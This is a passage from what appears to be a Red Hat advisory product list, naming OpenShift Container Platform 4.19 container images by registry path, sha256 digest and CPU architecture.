"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:35cd98a46072b8c966553d8bb60bc4ed2f3c055eeaf3e7c4d080ec9605f6a96f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6a108c888888fc9a2fb0a3b834aab6eb2a6c0b691a39e3461725f87580062a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6d2feee745979668785a904900f8c9d5327477f83361f26eb5879e87e081bd25_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:c17c46279d5ad92b5ad7a58a1dc1bb8331b15ab424e7274818a1c47898b528e2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:055fea2fc51b9eb48327b78542f420a1d65dbcf786324f7bcbeda053d3fd35bc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1d66a8807c27cd43c86399e67ec86906edb97be4ca38b4a752bef1c880848083_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:980e2f5e0f0676e559e91d50e2927fb9bf2f598db0d1ba043440e04d76cf46b9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dcd241b04a6e196ad8b66a9d3cce0df26f126e99a85ce7a5443e61dc76194e5b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:093a5ff464b31d0f1058c452843dd119dfd1798d91855dbe9fdbd5a45c912efb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2320a5d225dccf8f02379818bee2e93ae87a8444698f20141f6a0425b1661601_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:46adf0538ec9fbd67abc4565c013f2503c2a11191de264310a2c770bfb566753_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:d48ca3a08fbb356d69be5b61274d75b701d48803a9d57c8d377ce2d0df83169a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:0b1b706bc5a0188d40950a1fdd30f8c410e68dd568ed7d07c1f09443fbde28f4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:173800cfc487973c018e8d9badb7d60d26509bbe0803e9a56fba1d5a65070dc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:78a2368225915aca2a514c5d82ba82fff8e70e6123c08905c46839a821f4c8ab_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:e44aa77638b86f0ade3d4b69e150e8e9e95573ec90b6031224b87e404b5d6a79_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:313b7b7e1f619f5fd121ca2402d9db6876d021be227b496288809f63f1209561_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:5b232dcf5a47400d1b1d105895df8143b50dc74613b1463b275d6d304e0e0085_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:774dcaecbaa4f7b743b49c34a6a9889a27c6379110672a2f28fb4f83cb0f0fe6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:8d55cc650683e44676413797328fff9b3563eb78a1aae4cabe736b20e9f15ff4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:13cd27f7e445af565cef18a24ceca435b4ce2a0c99876b9ad087fdf50e343be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:5eee15ae4f809e708dbba035fdf60bd2c331462bc6256df74f9124fac03be62b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:af94257f6dd0307527211d5ab2b77ff971d5432a003d4f8e2f1e884cf6ee5215_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:cba1849a3d647457c561e01daf7eda74d775430a8b95458684620c0ebb3f47d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:1b9bd17c112e00f11fca3cfaea5908d0cd370598beb6909a3c00f58ca6774bee_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:2c646a3a35e8a4503f378096f6045fdb816fa9d5728cc14759748b7265aa47dc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:47fd82ed75709dd28b0f9f2eab2a051e3bedac64d2fa11dc93a8a8a7159e287b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:e95f8dd80a31504ccf2ff1ea37026370e41edd179151f1c7c2901e5ed12c1296_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:65c161d7215a460b2295a2b4eb82e8bd7e2079e145596185f83d84c4676f1eed_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:8f7e2a8735cb9b09639c5a467b8656bd7dd1bd4f72bc50164f0e4623ffacd93c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:a045bd36d61b9586134423526ec66f4aa18c140958a01da59ffaa4003c229e4e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:d426bb25b78392f8093739e457ab75adf9366406e09ef18f8c75d8998a24731e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:17333d63845becea642ecb6fd8f76e7a4d698f8a661a981b59e9c920d1973d46_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:5c73127d0656e37837d8dba2e4770da5bc26885daf37a4d708a04399410d85a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:ee3b7a97fb8e0f135e89f28c4f3ad31463a17003c92b979b4f16c262d8d69737_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:f59805de5ca2dde13a899b2058e1178288c80e4589515b08b89a6341f64fceb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:4892cd8581f10f3338980a4bc69f02d8379e54fc0f4c4d11af27baec253ea11a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:92295081a775d918e0963d2aff01bb21fc1200ca06faf7a882c652ebeee8c8f0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:a832bdd818c5c9aa386c7b8fc068c7e41454bd3ae5851e4a805e17c0a22485d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f3f2d167037e26af9b863e6561d2d64bcccdabfc3a6efa7f1085389ece519661_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:01d975619247a08e37e5d9fb38dcbca09555b283991441a4a208da524e4f8c74_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:04db41f215a8d65a168c117ad8cdbf0d0ca3dc4baaa5acede9e29beac647ce0e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:67d767e895fb0299033848441253b41588136a70e31763386c973672c26be496_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:be919e58f27fa8f244683d2b42e4aa2ab467dc93fe7c3c3c3b6032f3555627f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:083bb81614554fab84226913ccd021b11f7ef126606dbd10cabd727a501551e4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:1aa42ec77b3d3339df819904aa14a43382739617e532b5d0002a5e4ebc74736b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:83ef5cae2611a335710b324338a1f26d7e90a7918b4fe642e05e447e65d46b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:fa1d216867be999b74ea9e61644fe42315952afce3b6efce25308960adf393eb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:15832adc4ad8716113e5cb0aa6af6ab43aa6c4608e8909fe31041e46fce6ab42_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:596dad4fcad33b13f2db099ba3ac4aefa3e7ccde280a75b658df139227b63732_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:849b3cc7fe43ab6480fcd974e7796f5b8aa1e610add35558635b3c8afc602975_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a35e6d40471cdcec9fa54afc1da4c2ddb4ff2739b65bc67ddbff655aaf45a09f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:6c6b2ab932649b97579c8a76f57d9c8f0c8b2dededcd0843563d7bb85d116b8b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ab8f35a5cc7907c3114427a3f46489cf2cc54650caa9d15b1654fff6f0e43dc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ceedbad08f41cb0095006089b0595524a1ffa3c035f39e59d5ebbd5be07fcdce_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:fc090f33468f64fdd024263813034bd889ec44c61587ee9c1ecb8abdb9921da0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:23369a9840fe178321aa47458d1fea488bf37545f4a335d39ba4cc0711019c3e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:784f4206de4bb479ae43476c483face9ba3b209188b3a0201f66580b944fca02_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:87546cc6262c2c6eadb54266c42ccc03c3e2ad7c3c809ee21529f0bfb4707105_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:ed079597ea5b2fe6bf4d4b7efa09f6cb76691362c62a268accb0d5bb5fd7daed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:2845efdf030408d0d545862b74020ec95c2e2f4c0fbcd6d5834002fd1f224b9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ae56b7456515539ec14105e5a8221b83dc53c1a5571a6e46e0c3b0632f98096c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b3351e1878d5ef1111ce4b2eca74bad875b8773b11b8597f83c11a7f7b226da7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b72fc45f6e78468f442c5bf487721227053eb0d49ef3eea5be6cef181007e290_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:12309e06f58c6b122ebc7ef2958ec0a0526edd9ea21b888866dcc2f753a7cf2d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:5727ab378cdf09a1eb20b6120da5ee6d66a1473ea0d7dfd0709faf5c53df615f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:d85ca66233c95a4b622d97b50ae304dab7cd3ea67efbc40ab9ddb723478104b7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:f26b039b69b5d006e04148dd4e7d6bcada2ae22c8892e094e43c6bb307a99cea_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:1f2b394a49751e0cbc81a776a8abefaee56aea8a2449a56f66ec4fb8bd7b36a0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:5a3bb13d5a7dfd660ce6ca1799af07ff0eb73148a51b3e5864fda09650186530_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:a676ed9f3d05a12ca0965f8b33d002d95cc8578f5a74f0bcf984594d784b0e3c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:dbd96ce5c1082dd3f2de07bd34f805d64952bee798cd96f2d9f94d195acbfd2e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:0104fa2a05916db8ce121350b3e026a74891560be71999451943090f63d727a2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:590caaaf15b7a11ce69df24820ddc1f4b0b7a1c7cc5d2e62e2c3bfd35a5bb733_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69d052085b27f034e581680b283ed51134f2d8d5c895f0b2984946c158304249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69f33223ac1b30068c884ba58ef4f04545ed5d02dab43dd525ff3f66c299885f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:0beec3d7cd2663215fbfd97490b8aa1a684580e273dd9161d574f3ce5fe936b5_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:19636219d56bc03c8641e266ed3d82cae94bd7431e3da0c48ccba9bfb541ef6f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:2ad51487bd9dd02bdabe506d2c5758a9e9df2903a8a63d1a19d720281390eebc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:7c081487e39de209265d2bb960fb68fa2997e1620f37bdd3bb1aac57483bbbe7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:13560a7a1ab60ebe5a593c4c6819d730f1e8fad5031a5a38b7aa8ebcb52776b9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:4f90910be0a33320bf234e3c25b6c364a0e730d76be53fc8c7e50227c14e25e2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:7406a10e78b85749cd597d3ced8b69a87a7931119611e996dd8cd660ff1ac47c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:d710074f9ebfa1ec4e15c5ee4718b748259f8907f4ec0aa56045c00cf19a691c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:6bf2ac59bb7ee40409082d564bde5d5568be09bd21219fe0c62ebc6624912b1a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:8ad00ec95b55f781061f47a2b0b7b2ae6e557bb9cdbad826c097fde6a5b7d791_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:3dc93509b8cad942ffeea32ba1c75db4b94a66a8c1a6d7b29f13ed6ec83e5f9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:ae91dc01aca5115ba88290f86ab266ad69b86c68c83097adafb82defdfc5c524_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:67f9c3e3f77df4be9e4925fe7c5fb4cb95d770395bbb1b32847c7100d8f9e8fe_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:ef09a660c5bd1b44464ed961ade4f9ceef47dfe1005efde15de94631dadebf4f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:d1a5ebdd8e8fcd15749e48a18cf340a309c6c219c8adf85d2df1caa773784d86_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:de7f8ba8b4ed81e733af2d6b40e2dbb97c7afdc627973bfb838bd69ed9183eba_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:15b866541c161693e74ad7106aec45b9713f81e1f3e2f10deb0822b58fbb884e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:240132f7cf6ec28b4f711323b5c9f10ba76e85ba0ed2e66c663096089fdcc128_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:2191714083728cc0984775c5b8c3ee972723c1378058f0923ab60036345d9825_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:249b48b699ef21517d11a3533293184b1524b5907fec00593a98f0581363dc12_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:660ad818c22efdd4fb965ded889c7ed08b331cb8d50c145bd4a34e74158f790a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:deb01110f819b3534a2bd24b5406c69bcf5011eaebdeec438a31f1cd68f18029_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:255b3979a3a054696f21f437998c892b5738cbbcdc021b0a22752f1d9bb48712_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:d665a06a23572a2bcf3345f9c22b2b9895292e1f43d5532b793a3ea4df0c42c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:086285dd82aadc71803c847a06a2e0727b4fbb09f07a5bf95979ebc50bb95e82_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:0f5c719b22dbba95b6d61db0c63ba8107689a7d61f6944e0d2dc5fa3e693d25e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:1452416d5cfd9acae6f0bf60da783ec8cf632784655f4602462cf380cd7fe518_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:b13a67c30437a6950f41cdda853305d03ac24809746bdca955782db1c59824b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:43f58c25df6d439ab60c6a7fd905db92d67678bf55732103069b9d3ce9a6ee1d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:5eca83117e60a69246033c3cedcc2e2962e0f0a6ae6d6d7e3c35546cdc78ce70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:daddd3f94f513bfce03ea0c5aa406164838aa7bc41c3251b02686fd86da09d7a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:f1a3870617f3e6c0774b5484820351c404cabe3161684c6edf3b81554cf9f1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:4f54884bb854edec3a1a28ba089ddc068edc3ad0677637dd9b033a1c0ff8052c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:834a2b63a74d7af617155da8f25a36f196b7c16a78154468b1cb88a10fdfa88d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:3f79fe8b748ce5015d5d71ce8da20bbff7241868e87066d1d50083a3ceb91bfe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:66745a12cf917414d197c589e7e57a62958da4c66d5372e848e40568d8ddfafc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:900e5ff2f8ea86f0864c6a3cd1707a620427189f5bfffa0bb0ea9a8c0ed85330_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:c029ff100811f13c0ba79c03044e0c6f096567511c336e4d1ecced6e900c2acd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:37fe6420e98e7d1927492a7a40fd01578cfaf441530b7bf2f85cc7d593d7b097_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:480d7e114879e0c9bcfd62250af7f2f7b4a25e7d4cca65d97c422349fe164334_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6f49794879ad8a54b4a9ba77661ebdf84cb90a048d1472c1f878c10a9ecc46e6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:77c778debce0cb2eff5f5e66a3db3e30905e0138de3ddc3cd5330d2a79ec2cf9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:6aef6b3ea8ceb252107d24252c9c155e21d42825343e2a824d869f897a86da4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:895cb0d9b4715a75c1ffa4539bbd86c14f774e664ab16f5df4bc3e55ef537225_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:99fc0e641a6014bad4027471174578ba22c0a4a99c05b6bca1e8c838bbda0a90_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:aee32f17c4c4aa3deaca4a1884efc7c1a05d4fdadea145b247c4364e9e82086a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:07f2b6c01f22078c6b6eea7916982ebfcf6f992daf0d80af7b18972e6c484868_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:3efbeb0ba231cc16b69a86c43c28aa02b7e773413b361ceaf82c72cb215dc187_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:a212996fe27771f82406dc36d68e07e29ecf975834c3cde6395b35cd259edbe9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:b7f1f48335150e9e3ff89c0c349345f2c7fb6d7cf27793d263cca791d53f260c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:39852b09d2ff95f03cff6f39398c67d30d64366f00a0ca73319d81831b7f6e23_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6d2dbe2a871324b770da093074a9fcac3aa590896e366354f8202bf80eae70ed_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:9df2c55943c62172a5ab42fcd2309a232a8e455240efeba614e2e70308972764_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:e6aaec6333f15e8aa67ad391f57eb7225007c068947982d18fea6b90d837e6e2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:02c4fe2761b586f29c78d9419f0b90d98bee92b8d4fa47ec77dfe45795fab7fb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:4b1a4e3c67e3fc5c14a8cb7130eec3ea191f27473942f7afb09b497a30236947_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:a9e099fe57f31d4e86d0edbad9605aae421fbe410d1b7c2f6e7036940ba5e319_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:e3504f1bb6b8b89f4f01ecefc3c8646cbc949d638bfa6db0638476731d9f0e96_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:1cdfe759fe6d9b1745276957b712c1a46a69ce1c59706a7ba9ca8f3f89cc844d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:2fafd2b4c0fb8500c0180c767e55f70d26203e68500e64d252fe3a10227a161a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:5a96f6965efd6579efde9b1a1b4ae88b57cbb49f38cf2a39ef90a55470a30667_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:95c126293ef394a5ce8882e8cfa9c6f6c22e9cae79e64e07f0e1e57a8fb55211_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:4e885357cb52fffbb832d31d97400cfc629f26d5c38b4692379d08ba485f46d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:645168f7cb91679d374bc1e431181a1b964dec279265ec52e5809b368e08654c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:7c20e19cdbb62a268ffea39d5e0004fb4e6b587c41250c73180043f56b9fe0e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:c17396793e30858f900b68ed2981f38062d501b7600a5e4ca127d4e14113aca4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:56453e8ce0dbb39d0259d2f0b36f58d8f049bf6c1a880b8a1eaa37d8ade32067_ppc64le",
